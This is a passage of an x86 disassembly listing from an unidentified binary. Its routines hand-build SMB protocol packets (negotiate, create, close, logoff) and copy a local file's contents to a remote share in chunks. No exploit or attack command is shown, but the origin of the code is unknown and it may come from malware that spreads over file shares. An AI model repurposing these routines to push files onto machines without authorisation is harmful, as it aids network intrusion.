sub_411B10 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BD0 proc near ; CODE XREF: sub_408200+4A�p
; sub_411B10+33�p ...
var_320 = byte ptr -320h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFCE0h
push edi
push esi
push ebx
push 0
push 0
push 0FFFFFFFFh
push [ebp+arg_4]
push 0
push 0
call sub_41441A
shl eax, 1
mov ebx, eax
add ebx, 3
and bl, 0FCh
cmp [ebp+arg_0], 0
jz short loc_411C38
push ebx
lea eax, [ebp+var_320]
push eax
push 0FFFFFFFFh
push [ebp+arg_4]
push 0
push 0
call sub_41441A
mov esi, eax
xor eax, eax
mov edx, [ebp+arg_0]
mov [edx], esi
mov dword ptr [edx+4], 0
mov [edx+8], esi
add edx, 0Ch
push ebx
lea eax, [ebp+var_320]
push eax
push edx
call sub_40F5BF
loc_411C38: ; CODE XREF: sub_411BD0+2C�j
add ebx, 0Ch
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 8
sub_411BD0 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C50 proc near ; CODE XREF: sub_408440+28F�p
; sub_4089C0+46�p
var_6C = byte ptr -6Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFF94h
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+10h]
mov [ebp+var_8], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+arg_C]
mov [ecx], edi
push [ebp+arg_4]
push offset dword_41A94C
lea eax, [ebp+var_6C]
push eax
call sub_40A0F2
add esp, 0Ch
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
lea eax, [ebp+var_6C]
push eax
push edi
call sub_411BD0
add edi, eax
mov edx, [ebp+arg_8]
mov eax, [edx]
mov [edi], eax
mov eax, [edx+4]
mov [edi+4], eax
mov al, [edx+8]
mov [edi+8], al
mov al, [edx+9]
mov [edi+9], al
add edi, 0Ch
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
push dword ptr [edx+0Ah]
push edi
call sub_411BD0
add edi, eax
mov esi, [ebp+var_8]
sub edi, esi
mov ecx, [ebp+arg_10]
mov [ecx], edi
pop ebx
pop esi
pop edi
leave
retn 14h
sub_411C50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CE0 proc near ; CODE XREF: sub_407B46+117�p
; sub_407B46+1B4�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_40A1D6
leave
retn 4
sub_411CE0 endp
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+8]
call sub_40A1D6
leave
retn 4
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFE6Ch
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+14h]
mov [ecx], edi
push dword ptr [ebp+0Ch]
push offset dword_41A94C
lea eax, [ebp-194h]
push eax
call sub_40A0F2
add esp, 0Ch
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
lea eax, [ebp-194h]
push eax
push edi
call sub_411BD0
add edi, eax
mov dword ptr [edi], 2
add edi, 4
mov eax, [ebp+10h]
mov [edi], eax
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+18h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+10h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov dword ptr [edi], 0
add edi, 4
mov dword ptr [edi], 2000h
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+14h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+14h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
push dword ptr [ebp+10h]
call sub_40A26C
mov esi, eax
shl eax, 1
mov ebx, eax
mov [edi], ax
add edi, 2
add ax, 2
mov [edi], ax
add edi, 2
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
inc esi
mov [edi], esi
mov dword ptr [edi+4], 0
dec esi
mov [edi+8], esi
add edi, 0Ch
push ebx
push dword ptr [ebp+10h]
push edi
call sub_40F5BF
add edi, ebx
add edi, 3
and edi, 0FFFFFFFCh
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+18h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+18h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov eax, [ebp+14h]
mov [edi], eax
add edi, 4
mov dword ptr [edi], 4
add edi, 4
push 18h
push dword ptr [ebp+10h]
push edi
call sub_40F5BF
add edi, 18h
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+1Ch]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 18h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+18h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov eax, [ebp+10h]
mov [edi], eax
add edi, 4
mov eax, [ebp+14h]
mov [edi], eax
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+1Ch]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 18h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+14h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov eax, [ebp+10h]
mov [edi], eax
add edi, 4
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+18h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFE6Ch
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+10h]
mov [ecx], edi
mov dword ptr [edi], 0
add edi, 4
mov dword ptr [edi], 0
add edi, 18h
mov dword ptr [edi], 801h
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+14h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+14h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov eax, [ebp+10h]
mov [edi], eax
add edi, 14h
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+18h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+14h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov dword ptr [edi], 1
add edi, 4
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
mov dword ptr [edi], 1
add edi, 4
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
mov dword ptr [edi], 5
add edi, 4
push 1Ch
push dword ptr [ebp+10h]
push edi
call sub_40F5BF
add edi, 1Ch
add edi, 4
add edi, 4
mov dword ptr [edi], 1
add edi, 4
add edi, 4
add edi, 4
mov dword ptr [edi], 2
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+18h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFE6Ch
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+10h]
mov [ecx], edi
push dword ptr [ebp+0Ch]
push offset dword_41A94C
lea eax, [ebp-194h]
push eax
call sub_40A0F2
add esp, 0Ch
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
lea eax, [ebp-194h]
push eax
push edi
call sub_411BD0
add edi, eax
mov dword ptr [edi], 18h
add edi, 14h
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
mov dword ptr [edi], 0Ch
add edi, 4
mov word ptr [edi], 2
add edi, 2
mov byte ptr [edi], 1
add edi, 1
add edi, 1
mov dword ptr [edi], 800h
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+14h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+8]
mov eax, [ebx+10h]
mov [ebp-4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+14h]
mov [ecx], edi
push 14h
push dword ptr [ebp+0Ch]
push edi
call sub_40F5BF
add edi, 14h
mov dword ptr [edi], 1
add edi, 4
mov dword ptr [edi], 1
add edi, 4
push dword ptr [ebp+10h]
call sub_40A26C
mov esi, eax
shl eax, 1
mov ebx, eax
mov [edi], ax
add edi, 2
add ax, 2
mov [edi], ax
add edi, 2
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
inc esi
mov [edi], esi
mov dword ptr [edi+4], 0
dec esi
mov [edi+8], esi
add edi, 0Ch
push ebx
push dword ptr [ebp+10h]
push edi
call sub_40F5BF
add edi, ebx
add edi, 3
and edi, 0FFFFFFFCh
mov dword ptr [edi], 1
add edi, 4
add edi, 4
mov dword ptr [edi], 1
add edi, 4
add edi, 4
add edi, 4
mov dword ptr [edi], 2
add edi, 4
mov esi, [ebp-4]
sub edi, esi
mov ecx, [ebp+18h]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412230 proc near ; CODE XREF: sub_407B46+52D�p
; sub_407B46+538�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_0]
push 31Ah
push esi
call sub_40A1BE
or eax, eax
jnz short loc_412288
mov ecx, [esi]
cmp ecx, 46494C45h
jnz short loc_41225A
push esi
call sub_412290
jmp short loc_412288
; ---------------------------------------------------------------------------
loc_41225A: ; CODE XREF: sub_412230+20�j
cmp ecx, 50495045h
jnz short loc_41226A
push esi
call sub_412290
jmp short loc_412288
; ---------------------------------------------------------------------------
loc_41226A: ; CODE XREF: sub_412230+30�j
cmp ecx, 53455353h
jnz short loc_41227A
push esi
call sub_4123C0
jmp short loc_412288
; ---------------------------------------------------------------------------
loc_41227A: ; CODE XREF: sub_412230+40�j
cmp ecx, 53484152h
jnz short loc_412288
push esi
call sub_412340
loc_412288: ; CODE XREF: sub_412230+16�j
; sub_412230+28�j ...
pop ebx
pop esi
pop edi
leave
retn 4
sub_412230 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412290 proc near ; CODE XREF: sub_412230+23�p
; sub_412230+33�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz loc_41232B
mov esi, eax
push 8Dh
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 4
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov ecx, [ebx+56h]
mov [esi+18h], cx
add esi, 20h
mov byte ptr [esi], 3
mov eax, [ebx+186h]
mov [esi+1], ax
mov dword ptr [esi+3], 0FFFFFFFFh
mov word ptr [esi+7], 0
add esi, 9
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
mov esi, eax
cmp eax, 0FFFFFFFFh
jz short loc_41232B
add edi, 4
mov esi, [edi+5]
loc_41232B: ; CODE XREF: sub_412290+11�j
; sub_412290+93�j
push ebx
call sub_412700
pop ebx
pop esi
pop edi
leave
retn 4
sub_412290 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412340 proc near ; CODE XREF: sub_412230+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz short loc_4123B0
mov esi, eax
push 84h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 71h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov eax, [ebx+56h]
mov [esi+18h], ax
add esi, 20h
add esi, 3
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
loc_4123B0: ; CODE XREF: sub_412340+11�j
push ebx
call sub_412700
pop ebx
pop esi
pop edi
leave
retn 4
sub_412340 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123C0 proc near ; CODE XREF: sub_412230+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz short loc_412430
mov esi, eax
push 84h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 74h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
add esi, 20h
mov byte ptr [esi], 2
mov byte ptr [esi+1], 0FFh
add esi, 7
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
loc_412430: ; CODE XREF: sub_4123C0+11�j
or ebx, ebx
jz short loc_41245A
push dword ptr [ebx+8]
call sub_40A2FC
push 8000h
push 0
push dword ptr [ebx+0Ch]
call sub_40A230
or eax, eax
jnz short loc_412454
call sub_40A17C
loc_412454: ; CODE XREF: sub_4123C0+8D�j
push ebx
call sub_412700
loc_41245A: ; CODE XREF: sub_4123C0+72�j
pop ebx
pop esi
pop edi
leave
retn 4
sub_4123C0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 8
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412470 proc near ; CODE XREF: sub_408BB0+27�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
mov [ebp+var_C], 0FFFFFFFFh
mov edi, [ebp+arg_0]
or edi, edi
jz loc_4125C6
push 0
call sub_41274B
or eax, eax
jz loc_4125C6
mov [ebp+var_C], eax
mov ebx, eax
push 31Ah
push edi
push ebx
call sub_40F5BF
mov dword ptr [ebx], 46494C45h
mov [ebx+4], edi
push [ebp+arg_4]
call sub_40A266
inc eax
mov [ebp+var_8], eax
mov eax, [ebx+0Ch]
or eax, eax
jz loc_4125C6
mov esi, eax
push 0B7h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 0A2h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov eax, [ebx+56h]
mov [esi+18h], ax
add esi, 20h
mov byte ptr [esi], 18h
mov byte ptr [esi+1], 0FFh
mov eax, [ebp+var_8]
dec eax
mov [esi+6], ax
mov dword ptr [esi+8], 16h
mov dword ptr [esi+10h], 3019Fh
mov dword ptr [esi+1Ch], 20h
mov dword ptr [esi+20h], 0
mov dword ptr [esi+24h], 5
mov dword ptr [esi+28h], 44h
mov dword ptr [esi+2Ch], 2
mov byte ptr [esi+30h], 3
mov eax, [ebp+var_8]
mov [esi+31h], ax
add esi, 33h
push [ebp+var_8]
push [ebp+arg_4]
push esi
call sub_40F5BF
add esi, [ebp+var_8]
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
cmp eax, 0FFFFFFFFh
jz short loc_4125B7
add edi, 4
mov ecx, [edi+5]
or ecx, ecx
jnz short loc_4125A0
add edi, 20h
movzx ecx, word ptr [edi+6]
mov [ebx+186h], ecx
jmp short loc_4125C6
; ---------------------------------------------------------------------------
loc_4125A0: ; CODE XREF: sub_412470+11F�j
push ecx
call sub_414414
push [ebp+var_C]
call sub_412700
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_4125C6
; ---------------------------------------------------------------------------
loc_4125B7: ; CODE XREF: sub_412470+115�j
push [ebp+var_C]
call sub_412700
mov [ebp+var_C], 0FFFFFFFFh
loc_4125C6: ; CODE XREF: sub_412470+15�j
; sub_412470+24�j ...
mov eax, [ebp+var_C]
pop ebx
pop esi
pop edi
leave
retn 8
sub_412470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125D0 proc near ; CODE XREF: sub_408BB0+3A�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push esi
push edi
push ebx
mov [ebp+var_10], 0FFFFFFFFh
cmp [ebp+arg_0], 0
jz short loc_412658
mov [ebp+var_C], 0
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_4]
call sub_412670
cmp eax, 0FFFFFFFFh
jz short loc_412658
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
jmp short loc_41263A
; ---------------------------------------------------------------------------
loc_41260A: ; CODE XREF: sub_4125D0+6C�j
cmp ebx, 1000h
jnb short loc_412616
mov edi, ebx
jmp short loc_41261B
; ---------------------------------------------------------------------------
loc_412616: ; CODE XREF: sub_4125D0+40�j
mov edi, 1000h
loc_41261B: ; CODE XREF: sub_4125D0+44�j
lea eax, [ebp+var_14]
push eax
push edi
push esi
push [ebp+var_C]
push [ebp+arg_0]
call sub_414200
cmp eax, 0FFFFFFFFh
jnz short loc_412633
jmp short loc_41263E
; ---------------------------------------------------------------------------
loc_412633: ; CODE XREF: sub_4125D0+5F�j
add [ebp+var_C], edi
add esi, edi
sub ebx, edi
loc_41263A: ; CODE XREF: sub_4125D0+38�j
or ebx, ebx
jnz short loc_41260A
loc_41263E: ; CODE XREF: sub_4125D0+61�j
push 0C000h
push 0
push [ebp+var_8]
call sub_40A230
or ebx, ebx
jnz short loc_412658
mov [ebp+var_10], 0
loc_412658: ; CODE XREF: sub_4125D0+14�j
; sub_4125D0+30�j ...
mov eax, [ebp+var_10]
pop ebx
pop edi
pop esi
leave
retn 8
sub_4125D0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412670 proc near ; CODE XREF: sub_4125D0+28�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov ebx, 0FFFFFFFFh
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push [ebp+arg_0]
call sub_40A110
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_4126EC
push 0
push [ebp+var_4]
call sub_40A176
mov [ebp+var_8], eax
add eax, 3E8h
push 4
push 3000h
push eax
push 0
call sub_40A22A
or eax, eax
jz short loc_4126E4
mov edi, eax
mov ecx, [ebp+arg_4]
mov [ecx], edi
push 0
push esp
push [ebp+var_8]
push edi
push [ebp+var_4]
call sub_40A1E8
mov ecx, [ebp+arg_8]
mov eax, [ebp+var_8]
mov [ecx], eax
inc ebx
loc_4126E4: ; CODE XREF: sub_412670+53�j
push [ebp+var_4]
call sub_40A0FE
loc_4126EC: ; CODE XREF: sub_412670+2E�j
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_412670 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
dd 0
dd 24648Dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412700 proc near ; CODE XREF: sub_410F30+120�p
; sub_410F30+131�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
push esi
push ebx
push offset dword_41C060
call sub_40A134
xor ebx, ebx
mov esi, dword_41A958
mov edx, [ebp+arg_0]
jmp short loc_412721
; ---------------------------------------------------------------------------
loc_41271D: ; CODE XREF: sub_412700+23�j
inc ebx
add esi, 4
loc_412721: ; CODE XREF: sub_412700+1B�j
cmp [esi], edx
jnz short loc_41271D
xor ecx, ecx
mov edi, dword_41A958
mov [edi+ebx*4], ecx
push offset dword_41C078
call sub_40A1B2
push offset dword_41C060
call sub_40A1C4
pop ebx
pop esi
pop edi
leave
retn 4
sub_412700 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41274B proc near ; CODE XREF: rdata:0040507B�p
; sub_410F30+1D�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
cmp dword_41A958, 0
jnz short loc_41278A
push offset dword_41C060
call sub_40A1AC
mov eax, 0C7800h
add eax, 1000h
and eax, 0FFFFF000h
push 4
push 3000h
push eax
push 0
call sub_40A22A
mov dword_41A958, eax
loc_41278A: ; CODE XREF: sub_41274B+10�j
cmp dword_41C078, 1F4h
jbe short loc_4127A0
push 7D0h
call sub_40A212
loc_4127A0: ; CODE XREF: sub_41274B+49�j
push offset dword_41C060
call sub_40A134
xor ebx, ebx
mov esi, dword_41A958
mov edi, esi
jmp short loc_4127C6
; ---------------------------------------------------------------------------
loc_4127B6: ; CODE XREF: sub_41274B+7E�j
inc ebx
cmp ebx, 400h
jnz short loc_4127C3
xor edi, edi
jmp short loc_4127ED
; ---------------------------------------------------------------------------
loc_4127C3: ; CODE XREF: sub_41274B+72�j
add esi, 4
loc_4127C6: ; CODE XREF: sub_41274B+69�j
cmp dword ptr [esi], 0
jnz short loc_4127B6
mov esi, dword_41A958
add edi, 1000h
mov eax, 31Ah
mul ebx
add edi, eax
mov [esi+ebx*4], edi
push offset dword_41C078
call sub_40A1B8
loc_4127ED: ; CODE XREF: sub_41274B+76�j
mov [ebp+var_4], edi
push offset dword_41C060
call sub_40A1C4
mov eax, [ebp+var_4]
pop ebx
pop esi
pop edi
leave
retn 4
sub_41274B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412804 proc near ; CODE XREF: sub_410F30+86�p
; sub_411080+86�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov ebx, [ebx+4]
mov esi, [ebp+arg_4]
mov eax, [ebx+1Ch]
mov [esi+1Ah], ax
add dword ptr [ebx+20h], 10h
mov eax, [ebx+20h]
mov [esi+1Eh], ax
mov eax, [ebx+18h]
mov [esi+1Ch], ax
pop ebx
pop esi
pop edi
leave
retn 8
sub_412804 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 9B8D0000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412840 proc near ; CODE XREF: sub_407B46+109�p
; sub_407B46+1A6�p ...
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov ebx, 1
mov esi, [ebp+arg_8]
loc_412851: ; CODE XREF: sub_412840:loc_41287F�j
mov edi, 1000h
cmp edi, [ebp+arg_C]
jbe short loc_41285E
mov edi, [ebp+arg_C]
loc_41285E: ; CODE XREF: sub_412840+19�j
lea eax, [ebp+var_8]
push eax
push edi
push esi
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4142F0
xor ebx, ebx
add esi, edi
sub [ebp+arg_C], edi
cmp [ebp+arg_C], 0
jnz short loc_41287F
jmp short loc_412881
; ---------------------------------------------------------------------------
loc_41287F: ; CODE XREF: sub_412840+3B�j
jmp short loc_412851
; ---------------------------------------------------------------------------
loc_412881: ; CODE XREF: sub_412840+3D�j
mov [ebp+var_4], 0
push [ebp+arg_14]
push [ebp+arg_10]
push 4
lea eax, [ebp+var_4]
push eax
push 2
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411340
pop ebx
pop esi
pop edi
leave
retn 18h
sub_412840 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4128B0 proc near ; CODE XREF: sub_411800+9F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push esi
push edi
push ebx
mov esi, 0FFFFFFFFh
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz loc_412979
mov esi, eax
push 0EBh
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 72h
mov byte ptr [esi+9], 8
mov word ptr [esi+0Ah], 4001h
push esi
push ebx
call sub_412804
add esi, 20h
mov eax, [ebp+arg_8]
mov [esi+1], ax
add esi, 3
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40F5BF
add esi, [ebp+arg_8]
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
mov esi, 0FFFFFFFFh
cmp eax, 0FFFFFFFFh
jz short loc_412979
mov ecx, [edi]
push ecx
call sub_40A30E
cmp eax, 24h
jbe short loc_412979
add edi, 4
mov esi, [edi+5]
add edi, 20h
cmp byte ptr [edi+3], 3
jnz short loc_412979
movzx edx, byte ptr [edi]
shl edx, 1
add edx, 3
add edi, edx
cmp [ebp+arg_C], 0
jz short loc_412979
push 8
